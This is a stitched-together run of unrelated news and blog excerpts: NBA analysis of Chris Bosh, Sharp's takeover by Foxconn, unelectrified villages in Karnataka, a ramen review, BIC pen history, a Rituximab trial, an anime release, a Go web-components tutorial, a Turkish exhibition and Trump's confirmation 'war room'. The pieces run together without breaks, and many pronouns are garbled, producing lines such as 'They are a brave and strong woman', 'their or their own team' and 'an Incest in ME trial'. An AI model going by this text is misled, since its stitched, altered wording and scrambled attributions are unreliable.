The 30-year-old big man has been a revelation in the early going, ranking eighth in the league in scoring (23.6 points per game) and 13th in rebounding (10.3 caroms a night). And despite a significant increase in their workload — Bosh is finishing 28.4 percent of Miami's possessions with a field goal attempt (15.9 per game, up from 12.1 last year), a foul drawn (only James Harden, DeMar DeRozan, DeMarcus Cousins and Rudy Gay have taken more free throws than Bosh's 59) or a turnover (only 16 cough-ups through seven games), which would be the highest usage rate of their career — he's continued to score efficiently. Bosh is shooting 48.6 percent from the field and 36 percent from 3-point land on a career-high 3.6 long-range tries per game, helping fuel a career-best 26.8 PER that ranks fourth in the NBA behind only young monsters Anthony Davis and DeMarcus Cousins, and phenomenally effective part-time pogo stick Brandan Wright.
What's made Bosh's early-season explosion even more impressive, though, is that despite the increase in touches, shot attempts and trips to the foul line, they haven't just become a black hole. He's averaging a career-high three assists per game, too, notching a direct dime on 15.1 percent of their teammates' makes, and continuing to look for pressure-relief outlets on the perimeter like Wade, Norris Cole and Mario Chalmers.
"That's always a challenge when the ball is in your hands a lot," Bosh recently told DeAntae Prince of the Sporting News. "That's one of the biggest responsibilities coach gave me, and I'm still trying to get a feel for it. [...] I want to make sure that I'm facilitating the ball, because the easiest thing to do is to shoot it every time. And I don't want to be that sort of selfish guy. I want to make sure the ball is moving and I'm doing what I need to do to make sure I am facilitating like I'm supposed to."
For generations of fans raised to revere the shoot-first-and-ask-questions-later alpha dog work of Michael Jordan — and, too often, to forget that Mike dished at some pretty big moments themselves — it seems almost like a dereliction of duty when a player expected to score talks up the importance of sharing the ball and trying to get everybody else involved rather than going it alone. But in a modern NBA populated by grind-you-down defenses like the strong-side overload zone scheme popularized by Tom Thibodeau — and the shut-off-the-3-point-line, funnel-everything-into-a-7-foot-2-behemoth style favored by Miami's longtime nemesis and Wednesday night opponent, the Indiana Pacers — you're more likely to find success swinging the ball from side to side, spreading those lockdown units as thin as you can, hunting every little crease and crevice you can find to penetrate and kick, and relying on elite offensive talent in combination with a "many hands make light work" approach to breaking down the D.
Dictating what the defense will give you and then taking it with both hands creates opportunities for Deng to explode for 30 points in 37 minutes, as they did in Sunday's win over the Dallas Mavericks. Or for scrap-heap pickup Shawne Williams to go from afterthought to big-minutes starter, averaging 10 points per game on 42.4 percent shooting from 3-point land. Or for the occasional forays into heroism of the point-guard troika of Cole, Chalmers and rookie Shabazz Napier. Move the ball, cut hard, be ready and step into it with confidence, and we'll live with the result.
More than just "get as many top players as you can together," that was the lesson of the LeBron-Wade-Bosh era that resulted in four straight Finals trips, two NBA championships, and two defeats at the hands of spread-you-out-and-carve-you-up offenses. That's why, even without LeBron, the Heat rank fifth in the NBA in total passes per game and second in points created by assist per game, and show no signs of slowing things down any time soon.
“It's a habit you build,” Spoelstra recently told Grantland's Zach Lowe. “You learn how to play together and make the game easier for each other."
That, in turn, makes the game awful difficult on the opposition, and gives those who kept their talents in South Beach plenty of reason to smile, even if they no longer suit up alongside the best player in the world.
- - - - - - -
Dan Devine is an editor for Ball Don't Lie on Yahoo Sports. Have a tip? Email them at devine@yahoo-inc.com or follow them on Twitter!
Stay connected with Ball Don't Lie on Twitter @YahooBDL, "Like" BDL on Facebook and follow BDL's Tumblr for year-round NBA talk, jokes and more.
Sharp has approved an offer from Hon Hai Precision Industry and related companies to acquire over 66 percent of the company's voting stock, making the Taiwanese contract manufacturer the new parent of the venerable Japanese firm.
The deal, which will bring to ailing Sharp funds for investment in newer technologies like OLED, will be done through the issue of new shares to Hon Hai and partner companies for 489 billion yen (US$4.4 billion). Hon Hai will also acquire shares held by lenders to Sharp for around 200 billion yen.
A maker of Apple's iPhone and other key consumer electronics products, Hon Hai, which goes by the trade name Foxconn, has long eyed Sharp for its display business and manufacturing know-how. The Japanese company is also a supplier to Apple.
Sharp said it had received a commitment from Foxconn and related companies that its brand would be retained as well as its existing employees.
The Japanese company, which has businesses in consumer electronics, components like camera modules, solar cells and LCDs, was earlier negotiating a deal with Innovation Network Corporation of Japan, which is backed by the Japanese government.
The deal was seen to be attractive as it would keep the company in Japanese hands, but Sharp said Thursday that the arrangement would involve the company splitting out its display business, which would be then integrated into Japan Display, which combines the small and medium display businesses of Japanese companies like Sony, Toshiba and Hitachi. INCJ would in turn invest 300 billion yen into Sharp.
Sharp said it was looking for an investor that would support the company's investments in technologies such as robotics and the Internet of Things to address opportunities in the area of “new connections between people and house appliances.”
The company has been a household name in Japan and is still associated in the public mind with devices such as propelling pencils, which are still referred to as “Sharp pens.” One of the company's early creations was the “Hayakawa mechanical pencil,” named after the company's founder and developer of the device, Tokuji Hayakawa.
Sharp had earlier this month confirmed discussions with Foxconn and said the Taiwanese company had extended its offer to Feb. 29.
The company also said this month that its board of directors had agreed on a capital investment to increase production capacity and focus on small- and medium-size high-value added LCD panels at its Kameyama Plant No. 2. It said it aimed to counter over-supply and falling prices in the TV and smartphone display segment by focusing its production capacity on high-value added panels for the small- and medium-size market that are high-definition, narrow-framed and offer low power consumption.
Describing the business conditions facing the company as “still harsh,” Sharp also announced this month an extension to March 2017 of salary and allowance cuts for workers and managers that were introduced in August last year. It said the reductions would reduce costs by 3.6 billion yen for the year ending March 2017.
Foxconn has previously shown interest in investing in a 10 percent stake in Sharp.
On Thursday, shortly after Sharp's announcement of its approval of the deal, Foxconn appeared to throw doubts on the pact, saying it would postpone signing on the agreement until it had reviewed some “new material information” from Sharp, reports said.
BENGALURU: On Wednesday when the Karnataka energy department celebrated the 110th anniversary of electricity coming to Bengaluru - it was the first Indian city to get power supply -energy minister DK Shivakumar highlighted the state's achievements in the power sector and announced plans to provide 247 electricity supply to citizens.The state also holds an embarrassing distinction: 39 of its village shamlets have no electricity. People here live without electric lamps, fans and streetlights.Karnataka is the only southern state that has not achieved 100% electrification. According to documents available with TOI, 30 of the 39 unelectrified villages fall under the Hubli Electricity Supply Company (Hescom), eight under the Chamundeshwari Electricity Supply Company (Cescom), and one under the Mangalore Electricity Supply Company (Mescom).Recently, Union power minister Piyush Goyal said the states should look at alternative sources of energy to light up villages. So what's stopping the Karnataka energy department from supplying power supply to all villages?"Problems are plenty," says a senior officer of the en ergy department. "Many of these villages are located in side forests and tough terrains where it's difficult to draw distribution lines There are no proper roads to reach there," they add. For instance, Amadalli Machalli village in Karwar taluk of Uttara Kannada district is 18 km inside a forest. And it's not a regular village: a few houses are spread out on hillocks.Besides, the forest department doesn't allow us to cut trees for laying utilities," they pointed out.Why is the department not looking at alternative sources of energy? The official said the government is working towards the same under the Centre's Deen Dayal Upadhyaya Gram Jyoti Yojana. But there are challenges here as well."Even if we install solar panels, no private vendor will come forward to maintain them due to the long distance and rough terrains. If we think of using diesel generator sets, then there's the challenge of ensuring continuous supply of fuel. We are mulling over installing small hydel units near the streams close to these hamlets. But, before that, we want to prepare village-specific plans after consulting experts," the officer said.How did other states, which face similar challenges, achieve the target? Another officer with the energy department said they came across these villages only after the 2011 census."Earlier, they were not considered villages at all. The votes of their residents were attached to nearby villages.There are chances of other states not including small hamlets as villages at all," the officer maintained.
Neymar and Lionel Messi at Parc des Princes before Tuesday's training. (Franck Fifefranck — AFP/Getty Images)
Big day of football lies ahead …
UEFA Champions League quarterfinals, first leg
Porto vs. Bayern Munich, 2:45 p.m. ET (Fox Sports 2, ESPN Deportes, foxsoccer2go.com)
Paris Saint-Germain vs. Barcelona, 2:45 (Fox Sports 1, Fox Deportes, foxsoccer2go.com)
International friendly
United States vs. Mexico in San Antonio, 8:30 p.m. ET (Fox Sports 1, UniMas, Univision Deportes)
Americans abroad
England: Eric Lichaj and Nottingham Forest vs. Watford
Copa Libertadores: Edgar Castillo and Atlas vs. Atletico Mineiro (9 p.m. ET, Fox Deportes)
Austria: Conor O'Brien and Wiener Neustadt at Rheindorf Altach
Americans abroad (Tuesday)
Tim Ream played 90 minutes at left back in Bolton's 1-1 draw with Charlton
Danny Williams entered in the 59th of Reading's 1-0 defeat to Bournemouth
Zak Whitbread went 90 minutes at center back in Derby County's 4-0 victory over Blackpool
*Getting word Barcelona will play the Los Angeles Galaxy in a friendly this summer at the Rose Bowl. The date being tossed around is Aug. 1, which the Galaxy has already booked for an MLS match at Colorado. Is a schedule change in the works? Stay tuned on whether the friendly is finalized and the league game is moved.
*On Sunday, NBCSN's coverage of the Manchester derby between United and City attracted the largest cable TV audience for a Premier League match. Over the two hours, it averaged 1.1 million viewers and peaked at 1.3 million. The previous average record was 1 million for City-United on ESPN three years ago. Another 74,000 streamed Sunday's match on Live Extra. NBC's EPL coverage is up 10 percent over last year and 19 percent ahead among 18-49 year olds.
The highest-rated markets Sunday:
One of the producers of the infamous APEC stunt that saw 11 members of The Chaser's War on Everything charged by police in 2007 has criticised the laying of charges against the stunt video makers the Jalals.
"There's a big difference between saying 'I didn't find that funny' and 'that was a criminal offence'," the Chaser's Julian Morrow told Fairfax. "We're lucky to live in a country that is democratic and liberal, but we live in a time when the bar is constantly being lowered on what's a criminal offence, especially when it's even technically related to 'terrorism', and that's bad."
Morrow was speaking after the Jalal brothers Max, 20, and Arman, 18, and a 16-year-old male were charged by Victoria Police after posting of a prank video in which they faked a series of drive-by shootings while dressed in religious clothing.
The three were charged on Thursday with public nuisance, possessing a prohibited weapon and behaving in an offensive manner in a public place. The weapon charge – relating to carrying a fake gun without a permit – carries a maximum sentence of two years in prison.
Here's another one from T&T Supermarket up in Canada! Looks like a regular Japanese pack, right? This is actually a fresh ramen – frozen! Let's check it out!
The regulars here might have noticed that I haven't posted since Sunday. The reason? My wife Kit had surgery at the break of dawn on Monday. I spent the last few days by their side in the hospital and am happy to report they are doing great! Everyone who likes this site should give a big thanks to them – she's driven me around to countless Asian groceries and listened to me prattle on about instant noodles time and time again.  They are a brave and strong woman and I love them We got home today and it's great to be here with her!
Here's the import sticker (click image to enlarge). Looks to be meat-free, but check for yourself. Note – after sampling this, I really think that the 270mg of sodium is a bit off – maybe 1,270, but seems like more. I don't know how to gauge sodium amounts, but that's my two cents.
Here's the back of the packaging. From the instruction panels, it looks as if you can microwave the noodles much like a package of popcorn! I think I'll give it a try.
The noodle blocks.
The soup base liquid.
Here's the liquid base. Has a nice soy scent.
Finished (click image to enlarge). Added green onions, narutomaki, hard boiled egg, Walla Walla sweet onion and some beef I sauteed with a little Worcestershire. The noodles are decent – even going through the microwave. The little baggie they were in expanded like a puffer fish and the contents cooked nicely and evenly; it's like they were boiled in there. The only thing I didn't like was that until they met the broth, they wouldn't break apart. Although it probably mentions breaking them up in the text on the back of the packet. Either way, the noodles were of good quality. The broth was light and full of rich soy taste. Not extremely oily, but had a richness and a little oil. Quite nice. 4.75 out of 5.0 stars. UPC bar code 4901520113866.
Here's a Tablemark commercial.
It often takes just one eureka moment to come up with a killer idea but months, or in some cases years, of fine tuning to turn it into a certified global success. So it was with the BIC Cristal Biro, more commonly known as the BIC Biro.
In 1938 Hungarian László Bíró invented the very first ballpoint pen. Bíró, a journalist by trade, needed something that wrote quickly and effortlessly. The newspaper printing ink he'd been messing around with was a little too thick to flow through a conventional nib so they came up with the idea of a ball that could pick up the ink from an attached cartridge and plonk it onto the paper as it went round. So far so good. Then World War II intervened and they were forced to hightail it to Argentina.
Seven years later a French Baron, Marcel Bich, purchased a factory on the outskirts of Paris to manufacture parts for fountain pens and draughtsman's pencils. Their previous attempt at selling perfume at petrol stations hadn't quite been the success he'd imagined. Nevertheless, they scraped enough money together to acquire the rights to Bíró's invention and introduced their own version in 1950.
Bich invested in Swiss technology capable of cutting and shaping the-by-now tungsten tip into a one-millimeter sphere that allowed the ink to flow more freely.
The significant thing the business person brought to the party was their grasp of market dynamics specifically the idea of marrying high volume with low cost and disposability - understood today by companies as diverse as Primark and IKEA but at the time a relatively new concept. Bich immediately and drastically dropped the price. On its initial launch Bíró's invention was all but crippled by its cost – the average weekly wage of a secretary.
But the masterstroke came in 1953 when Pierre Guichenné, the big advertising guru of the day, persuaded Bich to shorten the family name to Bic a catchy, globally adaptable trade name for the pen and one which fit in with the emerging product-branding trends of a post-war planet. It worked. Fourteen mllion of them are sold every single day.
The design couldn't be simpler. Its hexagonal shaped barrel was taken from the traditional wooden pencil, giving three grip points and effectively stopping it from rolling off all but the wobbliest desk. The pen's transparent polystyrene barrel meanwhile lets you know when you need to shell out another 14 UK pence, 18 US cents or 22.5 Albanian Lek for a new one.
A tiny hole drilled in the barrel's body keeps the air pressure inside and outside the pen equal in order to ease flow. An extra hole in both cap and tube exists to stop the kind of people who chew on pens from choking on them. On this final note it's worth remembering that should you ever need it the BIC Cristal is the recommended tool of choice to perform an emergency tracheotomy (technically known as a cricothyrotomy) on anyone choking to death. Though we can't vouch for it writing the advertised 2kms afterwards.
See all the Everyday Icons
Everyday Icon #1 The Chupa Chups lollipop
Everyday Icon #2 The love New York logo
EDMONTON – Due to a continued rise in the number of whooping cough (or pertussis) cases, Alberta Health Services has declared an outbreak in its Central Zone.
So far this year, 107 cases have been confirmed in the central region of Alberta this year. Seven of those have required hospitalization.
The bacterial infection causes severe coughing that lasts for weeks. It can also lead to pneumonia, convulsions, brain damage and even death. Infants six months of age and younger are at greatest risk for these serious complications, according to AHS.
Because of that, AHS has increased the number of immunization appointments available in the region. The appointments are specifically intended for the following residents:
infants and pre-school aged children who are not up-to-date on immunizations;
caregivers and close contacts of infants such as parents, grandparents, nannies, child care staff (e.g. daycare centres and family day homes);
health care workers; and
women who are at least, or greater than, 26 weeks pregnant. According to AHS, immunizing women at or after 26 weeks of pregnancy is safe, and increases protection for newborn infants.
In Alberta, pertussis immunizations are offered free of charge through the province's routine childhood immunization program.
READ MORE: What caused a whooping cough epidemic in California? Scientists blame parents
Anyone who suspects they, or a family member, may be sick with pertussis should stay at home and call a family physician or Health Link Alberta, toll-free at 1-866-408-LINK (5465).
You can find out more about whooping cough here.
Norway funds Major Rituximab Trial
After a torrent of protest six months ago at the Norwegian Research Council's (NRC) failure to fund a Rituximab trial, the NRC said they would revisit the issue. This time they got it right, agreeing to provide funding for a big Phase 3 multi-center Rituximab trial in chronic fatigue syndrome (ME/CFS). It's not clear how much of the approximately $7,000,000 of their funding announcement, is going to go to the Rituximab trial, but with Fluge/Mella requesting between $1.1 – 1.7 million dollars (US), and the Council agreeing to fund it, it's hard to imagine the council not providing enough to support it.
(Phase 2 trials assess safety and efficacy in a small group. Phase III trials do so in a group large enough to fully assess safety and efficacy. )
Norway's Health and Human Services Minister, Jonas Gahr Støre, asked the research council to give ME/CFS applications priority, and they did, also funding a study on the risk factors and long term consequences of a Giardia outbreak that produced many ME/CFS/IBS patients . With two out of the ten funded studies focused on ME/CFS, the NRC was clearly in a supportive this time around – a real testament to the hard work of Norway's ME/CFS advocates.
The remarkable response to Dr. Maria Gerpe's ninety-day crowd-sourcing effort that raised a $430,000 no doubt helped the NRC to think again about their miserly approach. With the NRC's commitment and Maria's funding in the bag, Fluge/Mella will be able to start the trial soon, long before the NRC's funding becomes available in January of next year. That's a good thing given the trial may take up to two years.
That's a lot of money and this trial, in particular, with an expensive drug is going to be costly Maria reported that almost all the money for the trial will go to pay for the drug and the Fluge/Mella will be contributing their time free. That's an enormous amount of pro-bono time in a trial this size.
According to accounts on the internet, the trial will include about 140 patients
Cautionary Notes
Some notes of caution are in order. Several doctors I've talked to are taking a wait and see approach. While some of Dr. Kogelnik's patients are, for instance, are getting the same very positive results seen in the Norway trial, they didn't seem anywhere near suggesting this was the answer for ME/CFS.
There is concern about the ‘first study' effect which results in really positive results in carefully selected patients in a first trial and then much less positive results in bigger, later trials. We saw this happen when the extraordinary results of Dr. Montoya's preliminary Valcyte trial turned to quite underwhelming results in a larger, more rigorous trial. Just as in the Rituximab trial, several participants returned to full health in the first trial.
Fluge/Mella are ahead of Montoya in that their Phase II trial was successful (Montoya's was not but Phase III trials, with their large numbers of patients spread out across several centers, are the testing point. How important duration of illness is in determining how responsive patients are to the drug will be very interesting given reports from several physicians that longer duration patients are more difficult to treat and some research evidence suggesting that the disorder does change over time.
Importantly, both Kogelnik and Olav/Mella are engaged in trying to figure out why one person benefits while another does not.
David and Goliath II: David Wins Again
Big things can happen in small places. Norway is about the size of New Mexico. By the time this trial is though the NRC may very well contribute several million dollars to ME/CFS research. Contrast that with the four or so a million dollars the 28 billion dollar National Institutes of Health in the US can bring itself to spend on ME/CFS.
Let's put this in the context of Ampligen – a drug that's been much better studied in ME/CFS, and shows benefits, and, of course, would treat a disorder which has no drugs approved for it….and yet is left to sink or swim in the marketplace. There's something gravely wrong with the US approach that says a drug is only of interest if a drug company will provide X millions of dollars to study it. One wonders if the NIH/FDA has any second thoughts when a country the size of Norway does what the NIH/FDA cannot do; funds a clinical trial on a promising drug into a disorder the FDA says is serious, has huge unmet needs, and is a priority for them. Who's doing for ME/CFS?
Other Trials
Work on at least three Rituximab trials for ME/CFS appears to be underway; the Fluge/Mella Norway trial, the OMI-Merit trial in the US and an Incest in ME trial in the UK.
Conclusions
This is a big, big deal. One of the most promising drugs ever for ME/CFS is going to get a full-scale trial and that pretty much means irrefutable evidence either for or plus Rituximab. A Rituximab trial was priority #1 on OMI-MERIT's list of groundbreaking projects and to see it happen, in little Norway, of all places, is a head-shaker.
Significant numbers of responders would open up a much-needed new treatment option, send immune researchers scrambling to figure out what's going on and redefine how this disorder is researched, treated and funded.
Warner Bros. Japan began streaming the first three minutes and the title sequence of Strike the Blood II ( Strike the Blood Second ), the new original video anime (OVA) series adaptation of Gakuto Mikumo's Strike the Blood light novels, on Tuesday. The opening theme song is "Blood on the EDGE" by Kishida Kyōdan & THE AKEBOSHI ROCKETS, who also performed the television anime's opening theme song.
Warner Bros. Japan previously streamed a promotional video for the anime in August.
Most of the cast are returning for the new OVA series, which include Yoshimasa Hosoya as Kojō Akatsuki, Risa Taneda as Yukina Himeragi, Asami Seto as Asagi Aiba, Rina Hidaka as Nagisa Akatsuki, Ikumi Hayama as Sayaka Kirisaka, Ryota Ohsaka as Motoki Yaze, Kanae Itō as Kanon Kanase, and Hisako Kanemoto as Natsuki Minamiya. New cast members include Nao Tōyama as Yume Eguchi, and Yukiyo Fujii as Kiriha Kisaki. Both are new characters who first appear in the novel series' ninth volume, which the new OVA series will portray.
Much of the staff from the television anime adaptation and the Strike the Blood: Valkyria no Ōkoku-hen OVA are returning for Strike the Blood II , including Hideyo Yamamoto as director at SILVER LINK./CONNECT, Hiroyuki Yoshino on series composition, Keiichi Sano on animation character design, Aiko Taira as art director, Yukiko Tanno on color design, Takeshi Hirooka as director of photography, Kentarou Tsubome on editing, Jin Aketagawa as sound director, Magic Capsule on sound production, Assumed Sounds on music, Green as the background studio, and REAL-T as the editing studio. Other staff members include:
Mechanical design: Mika Akitaka
Visual design/mechanical design cooperation: Barn Storm Design Lab
Art design: Toshinari Tanaka
Mecha/Creature Design: Kio Edamatsu, Satoshi Yuri
3D CGI Production: Wired
3D Production Cooperation: IKIF+
Photography studio: Nexus
Risa Taneda is performing the ending theme song as their character Yukina Himeragi.
Strike the Blood II will have four two-episode volumes, with the first volume slated for DVD and Blu-ray Disc release on Wednesday, November 23. The OVA will start by depicting the story in the ninth light novel volume (cover shown right), and will take place in Blue Elysium, a resort facility near Itogami Island.
The second volume is slated for December 23, the third on March 29, and the fourth on April 26. The first volume's home video release will include the creditless opening and ending sequence, as well as a booklet containing annotations, an original story by Mikumo, and a manga.
The school action fantasy story of Strike The Blood begins with Kojō Akatsuki (voiced by Yoshimasa Hosoya in the earlier television anime), a boy deemed the "fourth progenitor" — the world's most powerful vampire, once thought to only exist in legend and lore. In the Itogamijima special zone for demons, a girl named Yukina Himeragi (Risa Taneda) is entrusted with watching over the vampire and if needed, hunting them down.
The novel series inspired a 24-episode television anime series in 2013, as well as an earlier two-episode OVA project in November and December 2015. Crunchyroll streamed the television anime series as it aired in Japan. Discotek licensed the television anime for North American home video.
Yen Press is publishing the light novel series in North America. It published the fourth volume on September 27. TATE has been serializing a manga adaptation in Kadokawa's Monthly Comic Dengeki Daioh magazine since 2012. The manga's ninth compiled book volume shipped on September 27.
Update: Though it was initially announced for December 21, the second volume's release date has been changed to December 23.
Web components in go
Vladimír Magyar Blocked Unblock Follow Sep 14, 2017
I was always terrified by the way the web is build. You must do everything by hand. Want some fancy button? Here is an div in a div in div with four different classes an bunch of javascript.
Also, now I've worked my way towards better understanding of css, but the beginnings were very hard. It felt like there are thousands of modifiers, selectors too complicated and I was always styling something just by trial and error.
And don't get me started on javascript. Everybody knows that: [] + "" === ""
HTML is kinda nice. The DOM is an tree, that's an great way to create separation between elements. Also the events, that you can listen to and attributes that are a kind of “API” of the element. But HTML is old, and must support previous versions (more or less). And let's be honest, HTML was originally designed for creating documents, it was not an application platform. Everything now is a div soup anyway.
I've always felt better when creating desktop apps. In desktop app you usually use some graphics library, like GTK, Qt or Tkinter. There is an runtime, an event system, and a collection of widgets. You can create your own widgets out of the existing widgets. You got bindings to your favorite language. Everything is nice and modular and the code is (mostly) more readable because you don't have to create an box in a box in a box to create an fancy button. You can create an FancyButton class that wraps all the boxes and use that new widget when you need it.
But then something magical happened! Someone thought that “hmm … this modularity thing is great, why we don't have it on web?”
And so web components came to life. It was slow and it isn't supported on all browsers now, but it runs :) (and there are polyfills). Now you don't have to use some framework to create interesting web apps. The platform is everything we need. Web components are actually multiple standards:
template — it's an element that you can use to stamp out it's content, to reuse it when you want to
shadowDOM — an way to encapsulate an DOM in a DOM, so it is separated and can't be changed from the outside
custom elements — finally the most important thing, you can register your own element, that has content defined by you, API defined by you and style defined by you
html imports and js modules — there was no way to import some stuff declaratively and now you can (this is not so important in this article)
And recently polymer became popular. If you are like me, than you also don't like big fat frameworks. A framework is good for all sorts of things, but only if you behave the way the framework allows. If you want to do something else, you must fight with it and that's sometimes difficult. Polymer is different, it is just an library. A thin layer of sugar on top of the web platform. So it's easier to create web components.
It combines the standards above, so you don't have to do it by hand, and also adds data bindings, so you don't have to write a bunch of boilerplate to move data from the DOM to your data structure.
But one thing bothered me. Javascript. Yeah, the good old javascript. I know, you are now like “hey! what's wrong with javascript. the new es6 has classes, and proxies and async/await and stuff”. But I've came from an world where types are important, where you can't add new properties to an object on the fly, where the compiler tells you when something is wrong. But i'm alright with javascript. After all, it's a language that was designed to do simple stuff on the web. Like: when you click here, then add some class there or so. And i'm not the only one who thinks that javascript is terrible.
So now I must confess. I love golang. It's simplicity, easy concurrency, interfaces and the general philosophy around it. It's a great language. And there is an compiler to js, called gopherjs, so you can write go and run it in the browser. So there have to be a way to do web components with go!
And now *drum roll*, ladies and gentlemen, let me introduce you golymer! An library, written from sketch in go, which enables you to create web components entirely in go. It has everything you need!
wraps your go struct so that it can be registered as a new custom element
stamps out your template to the shadow DOM of your element
maps the exported fields of your struct to the element attributes
has built in data bindings
has declarative event listening
field observers
This was an long intro, let's do some code! We will build an fancy clock element, and we can use the fancy go things! Like go's standard library and goroutines.
We create an template for our fancy clock element. There is just a style element and the current time to display. The time field is data binded to the template and every time the fields value will change, the text node in the template will also change. This will create the template element that will be used to stamp out the contents of our element on it's creation in the DOM.
Next we create a struct that represents the clock element. It must embed the golymer.Element it's name will be converted from CamelCase to kebab-case. So our FancyClock struct will be <fancy-clock> element.
Exported field Format will be mapped to an attribute of the element. Other fields will not be synchronized with the attributes.
We must also create an constructor of the element. It must be an function with no arguments and must return an pointer to the struct. Here we set the template of the element.
Our fancy clock will tick every second and it will update the actual time. Custom elements have some default life cycle callbacks. The ConnectedCallback is called when the element is connected to the DOM. We must call the default golymer.Element.ConnectedCallback() and also we can spin up a goroutine that will update the time or it will exit when it gets an signal from the done channel.
Notice that we just assign the new time to the time field an don't have to worry about that the changes will be reflected to the DOM. Golymer is doing some magic behind the scenes and captures the changes of the field and then actualizes the data bindings in the template.
DisconnectedCallback is called when the element is removed from the DOM. There we send the done signal to stop the goroutine. Like every good gopher, we also must know when our goroutines start and also when they will end.
And finally, an very important thing! We must introduce our new element to the browser. We do this with golymer.Define that takes the constructor of the element.
Like every go code, to run this piece of code, we must compile it. Gopherjs will build our package to one single file with no dependencies (like go build). If you are creating an app, with multiple custom elements, I'll recommend adding all of them in one package and compile it to one js file. Building the js file is easy:
$ gopherjs build
Now include the js file to your index.html and you can use the new element in the regular html.
the <fancy-clock> element
Isn't it great? We now have an new custom element clock that ticks, can be formated by changing the format attribute (with the golang reference time), we could use the amazing goroutines and channels in the browser. We didn't have to write a single line of javascript or write some ugly boilerplate code for the DOM manipulation. All relatively lightweight and using the platform.
So use the platform and use it with go!
Golymer also brings some common reusable custom elements (work in progress). There are some material design components and also some elements that will help you to declaratively manipulate the DOM.
Like the <dom-repeat> element that will stamp out an slice of objects with an delegate element.
<dom-repeat items="{{ItemsSlice}}" delegate="item-element"></dom-repeat>
Or the <dom-switch> that will show only one of it's child elements by the case attribute value.
<dom-switch expr="[[page]]">
<div id="div1" case="div1">1</div>
<div id="div2" case="div2">2</div>
<div id="div3" case="div3">3</div>
</dom-switch>
By changing the page field the <dom-switch> element will show the corresponding child div.
I think this is everything you have to know to start working with golymer. I'm thankful that you've been reading this far and hope that you will give a try and build some interesting custom element in go with golymer :)
A recent rumor based on an apparent Target listing got gamers and Game of Thrones fans excited yesterday: there seemed to be a Target page for something only called "Bethesda: Game of Thrones," leading people to believe that there might be an unannounced game coming from the Elder Scrolls and Fallout developer set in the universe of A Song of Ice And Fire. It was a tantalizing notion, and we can always dream. This particular rumor, however, is a hoax. Here's the official statement from a Target Spokesman:
“This is not a real product – we're sorry for any confusion.”
That doesn't leave a lot of room for interpretation. It is possible to spoof URLs, and it would not be surprising if that's what happened here.
There were two things that made this listing seem suspect. First, it was clearly neither a real listing nor a placeholder listing. Retail leaks happen because retailers have information before the press or public do, but they're fairly specific because of it. A lot of the time, you'll see the full, genuine listing going up before quickly being taken down. This wasn't that: it was just this single phrase. But that phrase also didn't look like a placeholder. Any retailer would at the very least know the name of the product in advance of putting a listing up, and it wouldn't be all that concerned about a game before there was an actual name attached to it. The second would be how long this page stayed up: genuine leaks are usually taken down fairly quickly.
Also, there's another Target listing for "Rockstar: Game of Thrones." Which, as much as we'd like to see it, is even less likely to be happening than a Bethesda Game of Thrones game. And, of course, the least plausible scenario is that we are somehow getting dueling open-world Game of Thrones adaptations from two of the biggest game developers in the industry.
That doesn't mean I wouldn't love to see a Bethesda Game of Thrones game.
Turkey's Museum of Shame opened its doors at Çankaya Municipality Contemporary Arts Center in Ankara.
Collections assembled by Devrimci 78'liler Federation, this year's slogan became “Freedom and Hopes Still Standing”.
Thee collection will exhibit items like Mahir Çayan's sweater as well as instruments of torture, letters from Mamak Prison and banned books. There will also be tabouret from the execution of Deniz Gezmiş, Hüseyin İnan and Yusuf Aslan - Turkey's student leaders facing death sentence in the 1970s.
Panels
This year's panels include topics of Armenians, child inmates, press freedom, women revolution in Rojava, migration and health, sick inmates, September 12 Coup, Alevis and Palestine as well as movie screenings and photo exhibitions.
Roboski
The collection will include photos of violence against press members and clothes of assassinated journalists. It will also expose the gory clothes of Uğur Kaymaz (12) from Mardin province, a police violence victim in 2004.
There will also be clothing items of victims from the massacres in Rojava, Palestine and Soma.
Gezi
The museum will also tell the story of Gezi Resistance with photos submitted across Turkey. Gas bomb canisters, gas masks and other items related to police violence will be shown as well.
The collection will also demonstrate the personal belongings of those who were killed during Gezi Resistance including Ethem Sarısülük, Ali İsmail Korkmaz, Mehmet Ayvalıtaş, Abdullah Cömert and Medeni Yıldırımın supported with videos.
The museum will be open until September 22. (YY/BM)
* Click here to read the article in Turkish.
Donald Trump's transition team is taking zero chances with the president-elect's Cabinet picks, assembling a “war room” to promote their strengths and fend off criticism before next month's confirmation hearings.
The transition team has recruited dozens of Republican public relations veterans and policy experts to help sell the public and the Senate on Trump's selections, according to sources close to the transition. Their task will be to convince Americans that the billionaires, generals, donors and CEOs chosen by the president-elect have the expertise to manage the federal government — even if they have no Washington experience.
Story Continued Below
“One of the things Americans wanted was a change election, so you have some unconventional candidates,” said a senior transition official.
Several of those candidates are expected to come under intense scrutiny for their policy views or potential conflicts of interest. While top transition officials say they're confident that a Republican-controlled Senate will greenlight all of them, they're taking pains to make the confirmation process as smooth as possible — and to shoot down problems quickly, especially after several early missteps.
“With a couple of the nominees, they made sophomoric mistakes,” said a Republican Senate aide, who asked to remain anonymous so as not to anger the incoming administration. “Like [retired Army Lt. Gen. Michael] Flynn's son being on the transition payroll, or [Steven] Mnuchin going on CNBC the day after they were nominated. They will have a harder time getting confirmed because of it.”
Now, with less than three weeks until the Senate begins holding confirmation hearings, the transition team is dramatically expanding its communications and political operation to guide nominees, with assistance from the Republican National Committee, volunteer public relations executives and The Heritage Foundation's director of digital strategy.
“Given the insatiable appetite of the public and the media, I think the transition saw this as necessary,” one transition official said.
Sources close to the transition say officials are also concerned that, with minimal internal vetting, the federal government or Senate committees could be the first to uncover potentially embarrassing revelations about the nominees when they dig through tax returns or financial disclosure forms.
To handle potential problems, Matt Well, a partner at The Herald Group, a consulting firm, is standing up the war room, tasked with defending the nominees, conducting research and coordinating with the top decision-makers in New York, one transition team member said.
Rather than employ a single strategy to grease the wheels, the team's approach will vary from individual to individual — each "is being viewed as its own special project,” said a GOP strategist close to the transition.
Every nominee has their or their own team of sherpas, or guides, to teach them about the inner workings of their agency, help prep them for confirmation hearings and guide them through the process of filing a mountain of paperwork, including financial disclosure forms and lengthy questionnaires from the Senate committees overseeing their nominations.
Since several of the nominees have never worked in the federal government, they face a particularly steep learning curve to get up to speed on the complexities of running a federal agency.
One of Dr. Ben Carson's top aides acknowledged that challenge before the retired neurosurgeon was tapped to lead the Department of Housing and Urban Development. "Dr. Carson feels they have no government experience, he's never run a federal agency,” the aide, Armstrong Williams, said last month. “The last thing they would want to do was take a position that could cripple the presidency."
